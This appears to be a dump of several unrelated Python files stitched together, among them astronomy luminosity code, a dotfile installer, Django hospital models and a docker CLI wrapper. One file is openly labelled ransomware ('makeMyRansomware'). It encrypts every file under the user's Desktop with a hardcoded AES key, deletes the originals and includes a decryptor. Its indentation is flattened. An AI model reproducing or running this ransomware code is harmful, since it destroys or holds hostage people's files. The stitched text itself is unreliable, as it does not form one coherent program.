    # 'a' is the start list id.  sorted() replaces the Python-2-only
    # dict.keys() + in-place .sort() idiom, so this also runs on Python 3.
    keys = sorted(answer_list)
    response['answer_ids'] = list(keys)
    response['answer_texts'] = [answer_list[a].start.name for a in keys]
    return response
if __name__ == "__main__":
    # Ad-hoc manual test harness (Python 2: note the print statement
    # below).  Points at a developer-local brat project directory.
    proj = ProjectConfiguration("/home/sander/Documents/Masterproef/brat/data/brat_vb/sentiment")
    #~ proj.get_text_type_hierarchy()
    #ann = Annotations("/home/sander/Documents/Masterproef/brat/data/brat_vb/sentiment/sporza")
    #textann = TextAnnotations(proj,ann.get_textLevels())
    #print textann.select(['0.2'],'0')
    #print textann.select(['1.2','1.3'],'0')
    #print textann.select(['5.2'],'0')
    #~ print "STARTLISTS"
    #~ print "###################"
    #~ print
    #~ print "LISTS"
    #~ print textann.lists
    #~ print "###################"
    #~ print
    #~ print "DEFS"
    #~ print textann.defs
    #~ print "###################"
    #~ print "#####SELECT########"
    #~ print textann.select('0.2','0')
    #detijd_other_Bekaert_12-05-05
    #~ import cProfile
    #~ cProfile.run('get_startlist("/brat_vb/sentiment/","sporza")')
    print get_list("/voorbeeld/","sporza")
    #~ print select('/brat_vb/sentiment/','sporza','0')
    #~ #print "#####UNSELECT#######"
    #~ print unselect('/brat_vb/sentiment/','sporza','0')
    #~ print select('/brat_vb/sentiment/','sporza','0.1','0')
# Simple demonstration of assigning and printing different value types.
a = 3
b = "tim"
c = (1, 2, 3)  # tuple literal; the parentheses were implicit originally
for value in (a, b, c):
    print(value)
import pandas as pd
import numpy as np
import math
from dust_extinction.parameter_averages import F19
def extinction_adjustment(rv):
    """Return F19 dust-extinction factors for every template wavelength.

    Wavelengths in the global *sn_templ* frame (Angstrom — TODO confirm)
    are converted to inverse microns before evaluating the F19 model.

    Parameters
    ----------
    rv : float
        Ratio of total to selective extinction (e.g. 3.1 for the Milky Way).
    """
    # Removed the unused 'len_wave' local from the original.
    # 1/(Angstrom/10000) == inverse microns, the unit F19 expects.
    wavenum_waves = [1 / (a / 10000) for a in sn_templ['Wavelength']]
    ext_model = F19(Rv=rv)
    return pd.Series(ext_model(wavenum_waves))
def Dm_to_Lum(sn_name):
    '''Convert the template fluxes of *sn_name* into extinction-corrected
    luminosities using the distance modulus from the global swift table.

    Relies on the module-level globals `swift` and `sn_templ` being set
    up beforehand by Lum_conv().
    '''
    def Grab_Lum(Dist_mod, Flux):
        # Luminosity = flux * 4*pi*d^2, with d derived from the distance
        # modulus: d[pc] = 10^(Dist_mod/5 + 1).
        P_cm= 3.08567758128*10**(18)  # one parsec in centimetres
        D_cm= 10**((Dist_mod/5)+1)*P_cm
        S_a= 4*np.pi*D_cm**2  # surface area of the sphere at distance d
        lum= Flux*S_a
        return lum
    # Locate the row for this supernova (the name may appear in any column).
    idex= swift.loc[swift.isin([sn_name]).any(axis=1)].index.tolist()
    idex=idex[0]
    Dist_mod= swift['Dist_mod_cor'][idex]
    Lum= pd.Series(sn_templ.apply(lambda row: Grab_Lum(Dist_mod=Dist_mod, Flux= row['Flux']), axis=1))
    # Correct for dust extinction with the standard Milky Way Rv = 3.1.
    Lum=Lum/extinction_adjustment(3.1)
    Lum=pd.DataFrame({'MJD': sn_templ['MJD'], 'Wavelength': sn_templ['Wavelength'], 'Luminosity': Lum.tolist()})
    return Lum
def Lum_conv(sn_name,output_file):
    '''Load the swift catalogue and a flux template, then convert to a
    luminosity template via Dm_to_Lum.

    Side effect: sets the module globals `swift` and `sn_templ` that
    Dm_to_Lum and extinction_adjustment read.
    '''
    global swift
    swift= pd.read_csv('../input/NewSwiftSNweblist.csv')
    global sn_templ
    '''Input desired template file name with Flux'''
    sn_templ= pd.read_csv(output_file)
    # Catalogue names lack the '_uvot' suffix used by the template files.
    sn_name= sn_name.replace("_uvot","")
    '''Input name of supernovae'''
    lum_templ= Dm_to_Lum(sn_name)
    return lum_templ
if __name__ == "__main__":
    # Example invocation for SN2005cs; result is the luminosity template.
    l=Lum_conv('SN2005cs_uvot','../output/TEMPLATE/SN2005cs_uvot_SNIa_series_template.csv')
    # print(type(l))
    # extinction_adjustment(3.1)
#!/usr/bin/env python3
from __future__ import print_function
# Copyright (C) 2015 Vibhav Pant <vibhavp@gmail.com>
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
import json
import os
import shutil
from sys import stderr
import argparse
# Fix Python 2.x: alias input() to raw_input so it always returns the
# typed string; on Python 3 raw_input is undefined and nothing changes.
try: input = raw_input
except NameError: pass
def ask_user(prompt):
    """Ask a yes/no question on stdin.

    Returns True for 'yes'/'y'/empty input and False for 'no'/'n';
    repeats the question until one of those answers is given.
    """
    answers = {"yes": True, 'y': True, '': True, "no": False, 'n': False}
    while True:
        print("{0} ".format(prompt), end="")
        reply = input().lower()
        if reply in answers:
            return answers[reply]
        print("Enter a correct choice.", file=stderr)
def create_directory(path):
    """Create *path* (with ~ expanded) and any missing parents."""
    expanded = os.path.expanduser(path)
    if os.path.isdir(expanded):
        return
    print("{0} doesnt exist, creating.".format(expanded))
    os.makedirs(expanded)
def create_symlink(src, dest, replace):
    # Symlink dest -> src.  Anything already at dest is deleted when
    # *replace* is set (or the user confirms); a link already pointing at
    # src is left alone.  Falls back to the Win32 API when os.symlink is
    # unavailable.
    dest = os.path.expanduser(dest)
    src = os.path.abspath(src)
    # A symlink whose target vanished: lexists() sees it, exists() doesn't.
    broken_symlink = os.path.lexists(dest) and not os.path.exists(dest)
    if os.path.lexists(dest):
        if os.path.islink(dest) and os.readlink(dest) == src:
            # Already points at the right target; nothing to do.
            print("Skipping existing {0} -> {1}".format(dest, src))
            return
        elif replace or ask_user("{0} exists, delete it? [Y/n]".format(dest)):
            if os.path.isfile(dest) or broken_symlink or os.path.islink(dest):
                os.remove(dest)
            else:
                shutil.rmtree(dest)
        else:
            return
    print("Linking {0} -> {1}".format(dest, src))
    try:
        os.symlink(src, dest)
    except AttributeError:
        # Old Windows Pythons lack os.symlink: call CreateSymbolicLinkW.
        import ctypes
        symlink = ctypes.windll.kernel32.CreateSymbolicLinkW
        symlink.argtypes = (ctypes.c_wchar_p, ctypes.c_wchar_p, ctypes.c_uint32)
        symlink.restype = ctypes.c_ubyte
        flags = 1 if os.path.isdir(src) else 0  # 1 = directory symlink
        symlink(dest, src, flags)
def copy_path(src, dest):
    """Copy a file or directory tree *src* to *dest*.

    When *dest* already exists the user is asked whether to delete it
    first; declining leaves everything untouched.
    """
    dest = os.path.expanduser(dest)
    src = os.path.abspath(src)
    if os.path.exists(dest):
        if not ask_user("{0} exists, delete it? [Y/n]".format(dest)):
            return
        # Files and symlinks can be unlinked; directories need rmtree.
        if os.path.isfile(dest) or os.path.islink(dest):
            os.remove(dest)
        else:
            shutil.rmtree(dest)
    print("Copying {0} -> {1}".format(src, dest))
    if os.path.isfile(src):
        shutil.copy(src, dest)
    else:
        shutil.copytree(src, dest)
def run_command(command):
    """Echo *command*, then execute it through the system shell."""
    print("Running {0}".format(command))
    os.system(command)
def main():
    """Parse arguments, load the JSON config and apply each section.

    Recognised config keys: 'directories', 'link', 'copy',
    'install' + 'install_cmd', and 'commands'.  Paths inside the config
    are resolved relative to the config file's directory.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument("config", help="the JSON file you want to use")
    parser.add_argument("-r", "--replace", action="store_true",
                        help="replace files/folders if they already exist")
    args = parser.parse_args()
    # Close the config file promptly instead of leaking the handle.
    with open(args.config) as config_file:
        js = json.load(config_file)
    os.chdir(os.path.expanduser(os.path.abspath(os.path.dirname(args.config))))
    # Plain loops instead of list comprehensions: these calls are run
    # purely for their side effects.
    if 'directories' in js:
        for path in js['directories']:
            create_directory(path)
    if 'link' in js:
        for src, dst in js['link'].items():
            create_symlink(src, dst, args.replace)
    if 'copy' in js:
        for src, dst in js['copy'].items():
            copy_path(src, dst)
    if 'install' in js and 'install_cmd' in js:
        packages = ' '.join(js['install'])
        run_command("{0} {1}".format(js['install_cmd'], packages))
    if 'commands' in js:
        for command in js['commands']:
            run_command(command)
    print("Done!")
# Run only when invoked as a script, not on import.
if __name__ == "__main__":
    main()
| 4,076 | 1,362 |
import os
import sys
from pathlib import Path
from sltxpkg import globals as sg
from sltxpkg import util as su
from sltxpkg.globals import (C_CACHE_DIR, C_CREATE_DIRS, C_DOWNLOAD_DIR, C_DRIVER_LOG,
C_TEX_HOME, C_WORKING_DIR)
from sltxpkg.log_control import LOGGER
from sltxpkg.types import SltxDependencies
def write_to_log(data: str):
    """Append *data* to the configured driver log, ensuring a trailing newline.

    No-op when the configured log path is empty or whitespace only.
    """
    log_path = sg.configuration[C_DRIVER_LOG]
    if not log_path.strip():
        return
    with open(log_path, 'a') as log_file:
        log_file.write(data)
        if not data.endswith('\n'):
            log_file.write("\n")
def load_configuration(file: str):
    """Apply given configuration file to the sltx config.

    Args:
        file (str): The configuration file to load; its keys override
            any existing configuration entries.
    """
    overrides = su.load_yaml(file)
    merged = dict(sg.configuration)
    merged.update(overrides)
    sg.configuration = merged
def expand_url(path: str, cwd: Path) -> str:
    """Expand a '{cwd}' placeholder in *path* using *cwd*'s parent directory.

    Returns the empty string when *path* is None.
    """
    if path is None:
        return ""
    return path.format(cwd=str(cwd.parent))
def load_dependencies_config(file: str, target: dict) -> SltxDependencies:
    """Apply given dependency file to the sltx dep list.

    Args:
        file (str): The file to load
        target (dict): The target dependency-collection to append it to
            (won't be modified)

    Returns:
        dict: The target dict with the added dependencies
    """
    y_dep = su.load_yaml(file)
    if 'dependencies' in y_dep:
        anchor = Path(file).absolute()
        for dep_name in y_dep['dependencies']:
            dep_data = y_dep['dependencies'][dep_name]
            # Expand any {cwd} placeholder relative to the dependency file.
            if 'url' in dep_data:
                dep_data['url'] = expand_url(dep_data['url'], anchor)
    merged = dict(target)
    merged.update(y_dep)
    return merged
def assure_dir(name: str, target_path: str, create: bool):
    """Ensure *target_path* exists, creating it when allowed.

    Args:
        name: human-readable label for log messages.
        target_path: directory that must exist.
        create: whether creation is permitted; when False and the
            directory is missing, the program exits with status 1.
    """
    if os.path.isdir(target_path):
        return
    if not create:
        # Lazy %-style args, consistent with the info call below
        # (the original concatenated the name into the format string).
        LOGGER.error("! Not allowed to create %s. Exit", name)
        sys.exit(1)
    LOGGER.info("> %s: %s not found. Creating...", name, target_path)
    os.makedirs(target_path)
def assure_dirs():
    """Expand and ensure (creating if allowed) every directory sltx needs."""
    sg.configuration[C_TEX_HOME] = su.get_sltx_tex_home()  # expansion
    create = sg.configuration[C_CREATE_DIRS]
    assure_dir('Tex-Home', sg.configuration[C_TEX_HOME], create)
    # The remaining paths only need '~' expansion before the check.
    for config, name in [(C_WORKING_DIR, 'Working-Dir'), (C_DOWNLOAD_DIR, 'Download-Dir'),
                         (C_CACHE_DIR, 'Cache-Dir')]:
        sg.configuration[config] = os.path.expanduser(
            sg.configuration[config])  # expansion
        assure_dir(name, sg.configuration[config], create)
| 2,472 | 820 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Nov 24 21:32:11 2020
@author: kw
"""
import glob
import os, random, struct
import getpass
from Cryptodome.Cipher import AES
class makeMyRansomware:
def __init__(self, your_extension=".Example", key=b'keyfor16bytes123', username=getpass.getuser()):
self.your_extension = your_extension
self.key = key
self.username = username
def encrypt_file(self, key, in_filename, out_filename=None, chunksize=64*1024):
if not out_filename:
out_filename = in_filename + self.your_extension
iv = os.urandom(16)
encryptor = AES.new(key ,AES.MODE_CBC, iv)
filesize = os.path.getsize(in_filename)
with open(in_filename, 'rb') as infile:
with open(out_filename, 'wb') as outfile:
outfile.write(struct.pack('<Q', filesize))
outfile.write(iv)
while True:
chunk = infile.read(chunksize)
if len(chunk) == 0:
break
elif len(chunk) % 16 != 0:
chunk += b' ' * (16 - len(chunk) % 16)
outfile.write(encryptor.encrypt(chunk))
def decrypt_file(self, key, in_filename, out_filename=None, chunksize=24*1024):
if not out_filename:
out_filename = os.path.splitext(in_filename)[0]
with open(in_filename, 'rb') as infile:
origsize = struct.unpack('<Q', infile.read(struct.calcsize('Q')))[0]
iv = infile.read(16)
decryptor = AES.new(key, AES.MODE_CBC, iv)
with open(out_filename, 'wb') as outfile:
while True:
chunk = infile.read(chunksize)
if len(chunk) == 0:
break
outfile.write(decryptor.decrypt(chunk))
outfile.truncate(origsize)
def Encryptor(self, startPath):
for filename in glob.iglob(startPath, recursive=True):
if(os.path.isfile(filename)):
print('Encrypting> ' + filename)
self.encrypt_file(self.key, filename)
os.remove(filename)
def Decryptor(self, startPath):
for filename in glob.iglob(startPath, recursive=True):
if(os.path.isfile(filename)):
fname, ext = os.path.splitext(filename)
if (ext == self.your_extension):
print('Decrypting> ' + filename)
self.decrypt_file(self.key, filename)
os.remove(filename)
if __name__ == "__main__":
import time
Ransom1 = makeMyRansomware(".Hello")
startpath = 'c:/Users/'+Ransom1.username+'/Desktop/**'
#You can encrypt or decrypt like this
Ransom1.Encryptor(startpath)
Ransom1.Decryptor(startpath) | 2,896 | 933 |
import uuid
from django.contrib.auth.models import User
from django.db import models
from django.urls import reverse
from django.core.validators import MaxValueValidator, MinValueValidator, RegexValidator
from landing.models import Profile
class Specialisation(models.Model):
    """A medical specialisation (e.g. cardiology) that hospitals and doctors offer."""
    class Meta:
        ordering = ('id',)
        verbose_name = 'specialisation'
        verbose_name_plural = 'specialisations'
    # Primary key is a generated UUID stored as a string; hidden from
    # forms via editable=False.
    id = models.CharField(unique=True, default=uuid.uuid4,
                          editable=False, max_length=50, primary_key=True)
    name = models.CharField(max_length=50)
    def __str__(self):
        return self.name
class Hospital(models.Model):
    # Hospital profile tied one-to-one to a Django auth user.
    class Meta:
        # highest-rated hospitals first by default
        ordering = ('-rating',)
        verbose_name = 'Hospital'
        verbose_name_plural = 'Hospitals'
    user = models.OneToOneField(User, on_delete=models.CASCADE)
    name = models.CharField(max_length=1000, null=True, blank=True)
    address = models.TextField(max_length=5000, null=True, blank=True)
    # slug used to build URLs (see get_url)
    slug = models.SlugField(unique=True, null=True, blank=True)
    # 1-5 star rating; drives the default ordering above
    rating = models.PositiveSmallIntegerField(default=3, validators=[
        MaxValueValidator(5),
        MinValueValidator(1),
    ])
    phone_regex = RegexValidator(regex=r'^\+?1?\d{9,15}$',
                                 message="Phone number must be entered in the format:"
                                         " '+919999999999'.")
    email = models.EmailField(blank=True, help_text="Please enter valid email address, it will be used for "
                                                    "verification.")
    phone_number = models.CharField(validators=[phone_regex], max_length=17, blank=True, help_text="Please enter "
                                                                                                  "valid phone "
                                                                                                  "number.")
    specialisation = models.ManyToManyField(Specialisation, related_name='speciality_of_hospital')
    # set True once the hospital has been verified (see email help_text)
    verified = models.BooleanField(default=False)
    def __str__(self):
        # NOTE(review): displays the linked user's first name, not self.name
        return self.user.first_name
    def get_url(self):
        return reverse('hospital:overview', args=[self.slug])
    def get_all_spec(self):
        # comma-separated list of specialisation names ('' when there are none)
        specs = ""
        for spec in self.specialisation.all():
            specs += spec.name + ", "
        return specs[:-2]
class Doctor(models.Model):
    # Doctor profile tied one-to-one to a Django auth user; owned by a Hospital.
    class Meta:
        ordering = ('name',)
        verbose_name = 'Doctor'
        verbose_name_plural = 'Doctors'
    user = models.OneToOneField(User, on_delete=models.CASCADE)
    name = models.CharField(max_length=1000, null=True, blank=True)
    address = models.TextField(max_length=5000, null=True, blank=True)
    slug = models.SlugField(unique=True, null=True, blank=True)
    # 1-5 star rating
    rating = models.PositiveSmallIntegerField(default=3, validators=[
        MaxValueValidator(5),
        MinValueValidator(1),
    ])
    # deleting the hospital cascades to its doctors
    hospital = models.ForeignKey(Hospital, related_name='doctor', on_delete=models.CASCADE)
    specialisation = models.ManyToManyField(Specialisation, related_name='speciality')
    def __str__(self):
        return self.name
    def get_url(self):
        return reverse('hospital:doctor-home', args=[self.slug])
    def get_all_spec(self):
        # comma-separated list of specialisation names ('' when there are none)
        specs = ""
        for spec in self.specialisation.all():
            specs += spec.name + ", "
        return specs[:-2]
class Appointment(models.Model):
    # Booking between a patient (landing.Profile) and a Doctor.
    class Meta:
        # newest appointments first
        ordering = ('-start_date',)
        verbose_name = 'Appointment'
        verbose_name_plural = 'Appointments'
    # UUID string primary key, generated once and never editable.
    id = models.CharField(unique=True, default=uuid.uuid4,
                          editable=False, max_length=50, primary_key=True)
    doctor = models.ForeignKey(Doctor, on_delete=models.CASCADE, null=True)
    patient = models.ForeignKey(Profile, on_delete=models.CASCADE, null=True)
    start_date = models.DateTimeField(blank=True, null=True,
                                      help_text="You can choose dates from now")
    end_date = models.DateTimeField(blank=True, null=True,
                                    help_text="You can choose appointment "
                                              "duration as maximum of 7 days")
    patients_remarks = models.TextField(blank=True, null=True)
    doctors_remarks = models.TextField(blank=True, null=True)
    # approval workflow flags; a rejection may carry a cause
    approved = models.BooleanField(default=False)
    rejected = models.BooleanField(default=False)
    rejection_cause = models.TextField(max_length=20000, blank=True, null=True)
    def __str__(self):
        return str(self.doctor.name + "-" + self.patient.user.first_name)
    def get_start_date(self):
        # date portion only; raises AttributeError when start_date is null
        return self.start_date.date()
    def get_end_date(self):
        # date portion only; raises AttributeError when end_date is null
        return self.end_date.date()
| 4,756 | 1,387 |
import os
import json

# Scan every .json file in the extraction directory and report the files whose
# "entities" mapping or "text" field is empty.
json_files = set()
errors = set()
directory = "extracted/json/"  # renamed from `dir`, which shadows the builtin
for name in os.listdir(directory):
    # match the extension exactly; `".json" in name` also caught e.g. x.json.bak
    if name.endswith(".json"):
        json_files.add(name)
        with open(os.path.join(directory, name), "r") as f:
            # parse straight from the handle; joining f.read() was a no-op
            j = json.load(f)
        if j["entities"] == {} or j["text"] == "":
            errors.add(name)
# an empty `errors` set is falsy, so the success message prints instead
print(errors or "All good. Scanned files: " + str(len(json_files)))
| 409 | 141 |
__author__ = 'rcj1492'
__created__ = '2016.03'
__license__ = 'MIT'
from labpack.handlers.requests import requestsHandler
class dockerClient(requestsHandler):
    ''' a class of methods for interacting with the docker cli on localhost '''
    # jsonmodel schema used by self.fields to validate every method input.
    # regex components use raw strings so "\d" is not treated as a string
    # escape (a SyntaxWarning on Python 3.12+); the string values are identical.
    _class_fields = {
        'schema': {
            'virtualbox_name': '',
            'container_alias': '',
            'image_name': '',
            'image_tag': '',
            'image_id': '',
            'sys_command': '',
            'environmental_variables': {},
            'envvar_key': '',
            'envvar_value': '',
            'mapped_ports': {},
            'port_key': '1000',
            'port_value': '1000',
            'mounted_volumes': {},
            'mount_field': '',
            'start_command': '',
            'network_name': '',
            'run_flags': ''
        },
        'components': {
            '.envvar_key': {
                'must_contain': [ r'^[a-zA-Z_][a-zA-Z0-9_]+$' ],
                'max_length': 255
            },
            '.envvar_value': {
                'max_length': 32767
            },
            '.port_key': {
                'contains_either': [ r'\d{2,5}', r'\d{2,5}\-\d{2,5}' ]
            },
            '.port_value': {
                'contains_either': [ r'\d{2,5}', r'\d{2,5}\-\d{2,5}' ]
            }
        }
    }
def __init__(self, virtualbox_name='', verbose=False):
    '''
    a method to initialize the dockerClient class

    :param virtualbox_name: [optional] string with name of virtualbox image
    :param verbose: [optional] boolean to print progress dots during startup
    :return: dockerClient object
    '''
    title = '%s.__init__' % self.__class__.__name__
    # construct super
    super(dockerClient, self).__init__()
    # construct fields model (validates all method inputs against _class_fields)
    from jsonmodel.validators import jsonModel
    self.fields = jsonModel(self._class_fields)
    # validate inputs
    input_fields = {
        'virtualbox_name': virtualbox_name
    }
    for key, value in input_fields.items():
        if value:
            object_title = '%s(%s=%s)' % (title, key, str(value))
            self.fields.validate(value, '.%s' % key, object_title)
    # construct properties
    self.vbox = virtualbox_name
    self.verbose = verbose
    # construct localhost (os/platform introspection helper)
    from labpack.platforms.localhost import localhostClient
    self.localhost = localhostClient()
    # verbosity
    if self.verbose:
        print('Checking docker installation...', end='', flush=True)
    # validate docker installation (raises when the docker CLI is missing)
    self._validate_install()
    if self.verbose:
        print('.', end='', flush=True)
    # validate virtualbox installation (only relevant on Windows 7/8 hosts)
    self.vbox_running = self._validate_virtualbox()
    if self.verbose:
        print('.', end='', flush=True)
    # set virtualbox variables so the docker CLI can reach the VM daemon
    if self.vbox_running:
        self._set_virtualbox()
    if self.verbose:
        print('.', end='', flush=True)
    if self.verbose:
        print(' done.')
def _validate_install(self):
    ''' verify that the docker CLI is available on this machine '''
    from subprocess import check_output, STDOUT
    try:
        # any successful invocation proves the binary is on PATH
        check_output('docker --help', shell=True, stderr=STDOUT).decode('utf-8')
    except Exception:
        raise Exception('"docker" not installed. GoTo: https://www.docker.com')
    return True
def _validate_virtualbox(self):
    '''
    a method to validate that virtualbox is running on Win 7/8 machines

    :return: boolean indicating whether virtualbox is running
    :raises Exception: when docker-machine or the named virtualbox is unavailable
    '''
    # validate operating system (a virtualbox VM is only needed below Windows 10)
    if self.localhost.os.sysname != 'Windows':
        return False
    win_release = float(self.localhost.os.release)
    if win_release >= 10.0:
        return False
    # validate docker-machine installation
    from os import devnull
    from subprocess import call, check_output, STDOUT
    sys_command = 'docker-machine --help'
    try:
        check_output(sys_command, shell=True, stderr=STDOUT).decode('utf-8')
    except Exception as err:
        raise Exception('Docker requires docker-machine to run on Win7/8. GoTo: https://www.docker.com')
    # validate virtualbox is running (stderr discarded; failure means not found)
    sys_command = 'docker-machine status %s' % self.vbox
    try:
        vbox_status = check_output(sys_command, shell=True, stderr=open(devnull, 'wb')).decode('utf-8').replace('\n', '')
    except Exception as err:
        if not self.vbox:
            raise Exception('Docker requires VirtualBox to run on Win7/8. GoTo: https://www.virtualbox.org')
        elif self.vbox == "default":
            raise Exception('Virtualbox "default" not found. Container will not start without a valid virtualbox.')
        else:
            raise Exception('Virtualbox "%s" not found. Try using "default" instead.' % self.vbox)
    if 'Stopped' in vbox_status:
        raise Exception('Virtualbox "%s" is stopped. Try first running: docker-machine start %s' % (self.vbox, self.vbox))
    return True
def _set_virtualbox(self):
    '''
    a method to set virtualbox environment variables for docker-machine

    :return: True
    '''
    from os import environ
    # only populate the environment once per process
    if not environ.get('DOCKER_CERT_PATH'):
        import re
        sys_command = 'docker-machine env %s' % self.vbox
        cmd_output = self.command(sys_command)
        variable_list = ['DOCKER_TLS_VERIFY', 'DOCKER_HOST', 'DOCKER_CERT_PATH', 'DOCKER_MACHINE_NAME']
        for variable in variable_list:
            # extract the VAR="value" assignment for each variable from the
            # docker-machine env output and export it to this process
            env_start = '%s="' % variable
            env_end = '"\\n'
            env_regex = '%s.*?%s' % (env_start, env_end)
            env_pattern = re.compile(env_regex)
            env_statement = env_pattern.findall(cmd_output)
            env_var = env_statement[0].replace(env_start, '').replace('"\n', '')
            environ[variable] = env_var
    return True
def _images(self, sys_output):
    '''
    a helper method for parsing `docker images` output

    :param sys_output: string with raw stdout from the docker images command
    :return: list of dictionaries, one per image, keyed by the column headers
    '''
    import re
    # columns are separated by tabs or runs of 2+ spaces; a raw string avoids
    # the invalid "\s" escape warning raised on Python 3.12+
    gap_pattern = re.compile(r'\t|\s{2,}')
    output_lines = sys_output.split('\n')
    column_headers = gap_pattern.split(output_lines[0])
    image_list = []
    for line in output_lines[1:]:
        columns = gap_pattern.split(line)
        # only rows with a full set of columns are images (skips blank tail line)
        if len(columns) == len(column_headers):
            image_list.append(dict(zip(column_headers, columns)))
    return image_list
def _ps(self, sys_output):
    '''
    a helper method for parsing `docker ps` output

    :param sys_output: string with raw stdout from the docker ps command
    :return: list of dictionaries, one per container, keyed by column headers
    '''
    import re
    # columns are separated by tabs or runs of 2+ spaces; a raw string avoids
    # the invalid "\s" escape warning raised on Python 3.12+
    gap_pattern = re.compile(r'\t|\s{2,}')
    output_lines = sys_output.split('\n')
    column_headers = gap_pattern.split(output_lines[0])
    container_list = []
    for line in output_lines[1:]:
        columns = gap_pattern.split(line)
        if len(columns) > 1:
            # default every header to '' so short rows still carry all keys
            container_details = {header: '' for header in column_headers}
            for header, value in zip(column_headers, columns):
                container_details[header] = value
            # stupid hack for possible empty port column: when the row is one
            # column short, the container name lands under PORTS -- shift it
            # (plain assignment suffices; the value is an immutable string, so
            # the original deepcopy was unnecessary)
            if container_details['PORTS'] and not container_details['NAMES']:
                container_details['NAMES'] = container_details['PORTS']
                container_details['PORTS'] = ''
            container_list.append(container_details)
    return container_list
def _synopsis(self, container_settings, container_status=''):
    '''
    a helper method for summarizing container settings

    :param container_settings: dictionary from docker inspect for the container
    :param container_status: [optional] string to override a detected 'exited' status
    :return: dictionary with compose-relevant fields extracted from the settings
    '''
    # compose default response
    settings = {
        'container_status': container_settings['State']['Status'],
        'container_exit': container_settings['State']['ExitCode'],
        'container_ip': container_settings['NetworkSettings']['IPAddress'],
        'image_name': container_settings['Config']['Image'],
        'container_alias': container_settings['Name'].replace('/',''),
        'container_variables': {},
        'mapped_ports': {},
        'mounted_volumes': {},
        'container_networks': []
    }
    # parse fields nested in container settings
    import re
    # raw string avoids the invalid "\d" escape warning on Python 3.12+
    num_pattern = re.compile(r'\d+')
    if container_settings['NetworkSettings']['Ports']:
        for key, value in container_settings['NetworkSettings']['Ports'].items():
            if value:
                port = num_pattern.findall(value[0]['HostPort'])[0]
                settings['mapped_ports'][port] = num_pattern.findall(key)[0]
    elif container_settings['HostConfig']['PortBindings']:
        for key, value in container_settings['HostConfig']['PortBindings'].items():
            port = num_pattern.findall(value[0]['HostPort'])[0]
            settings['mapped_ports'][port] = num_pattern.findall(key)[0]
    if container_settings['Config']['Env']:
        for variable in container_settings['Config']['Env']:
            # BUGFIX: split only on the first '=' -- env values may themselves
            # contain '=' (e.g. base64 payloads), which crashed the 2-tuple unpack
            k, v = variable.split('=', 1)
            settings['container_variables'][k] = v
    for volume in container_settings['Mounts']:
        system_path = volume['Source']
        container_path = volume['Destination']
        settings['mounted_volumes'][system_path] = container_path
    if container_settings['NetworkSettings']:
        if container_settings['NetworkSettings']['Networks']:
            for key in container_settings['NetworkSettings']['Networks'].keys():
                settings['container_networks'].append(key)
    # determine stopped status: a container which still answers `docker logs`
    # was stopped deliberately rather than crashed
    if settings['container_status'] == 'exited':
        if not container_status:
            try:
                from subprocess import check_output, STDOUT
                sys_command = 'docker logs --tail 1 %s' % settings['container_alias']
                check_output(sys_command, shell=True, stderr=STDOUT).decode('utf-8')
                settings['container_status'] = 'stopped'
            except:
                pass
        else:
            settings['container_status'] = container_status
    return settings
def images(self):
    '''
    a method to list the local docker images

    :return: list of dictionaries, one per image, e.g.
        [ { 'REPOSITORY': 'test1', 'TAG': 'latest', 'IMAGE ID': '2298fbaac143',
            'CREATED': '7 days ago', 'VIRTUAL SIZE': '302.7 MB' } ]
    '''
    raw_output = self.command('docker images')
    return self._images(raw_output)
def ps(self):
    '''
    a method to list the local docker containers (running and stopped)

    :return: list of dictionaries, one per container, e.g.
        [ { 'CONTAINER ID': '38eb0bbeb2e5', 'IMAGE': 'rc42/flaskserver',
            'COMMAND': '"gunicorn --chdir ser"', 'CREATED': '6 minutes ago',
            'STATUS': 'Up 6 minutes', 'PORTS': '0.0.0.0:5000->5000/tcp',
            'NAMES': 'flask' } ]
    '''
    raw_output = self.command('docker ps -a')
    return self._ps(raw_output)
def network_ls(self):
    '''
    a method to list the available docker networks

    :return: list of dictionaries with docker network fields
    [{
        'NETWORK ID': '3007476acfe5',
        'NAME': 'bridge',
        'DRIVER': 'bridge',
        'SCOPE': 'local'
    }]
    '''
    import re
    # raw string avoids the invalid "\s" escape warning on Python 3.12+
    gap_pattern = re.compile(r'\t|\s{2,}')
    network_list = []
    sys_command = 'docker network ls'
    output_lines = self.command(sys_command).split('\n')
    column_headers = gap_pattern.split(output_lines[0])
    for i in range(1, len(output_lines)):
        columns = gap_pattern.split(output_lines[i])
        network_details = {}
        if len(columns) > 1:
            # default every header to '' so short rows still carry all keys
            for j in range(len(column_headers)):
                network_details[column_headers[j]] = ''
                if j <= len(columns) - 1:
                    network_details[column_headers[j]] = columns[j]
            network_list.append(network_details)
    return network_list
def inspect_container(self, container_alias):
    '''
    a method to retrieve the settings of a container

    :param container_alias: string with name or id of container
    :return: dictionary of settings of container
    '''
    title = '%s.inspect_container' % self.__class__.__name__
    # validate inputs
    object_title = '%s(container_alias=%s)' % (title, str(container_alias))
    self.fields.validate(container_alias, '.container_alias', object_title)
    # send inspect command and return the first (only) record
    import json
    raw_output = self.command('docker inspect %s' % container_alias)
    return json.loads(raw_output)[0]
def inspect_image(self, image_name, image_tag=''):
    '''
    a method to retrieve the settings of an image

    :param image_name: string with name or id of image
    :param image_tag: [optional] string with tag associated with image
    :return: dictionary of settings of image
    '''
    title = '%s.inspect_image' % self.__class__.__name__
    # validate inputs
    input_fields = {'image_name': image_name, 'image_tag': image_tag}
    for key, value in input_fields.items():
        if value:
            object_title = '%s(%s=%s)' % (title, key, str(value))
            self.fields.validate(value, '.%s' % key, object_title)
    # determine system command argument (name, optionally qualified by tag)
    sys_arg = '%s:%s' % (image_name, image_tag) if image_tag else image_name
    # run inspect command and return the first (only) record
    import json
    return json.loads(self.command('docker inspect %s' % sys_arg))[0]
def rm(self, container_alias):
    '''
    a method to remove an active container

    :param container_alias: string with name or id of container
    :return: string with container id
    '''
    title = '%s.rm' % self.__class__.__name__
    # validate inputs
    object_title = '%s(container_alias=%s)' % (title, str(container_alias))
    self.fields.validate(container_alias, '.container_alias', object_title)
    # force-remove the container; docker echoes the id on the first line
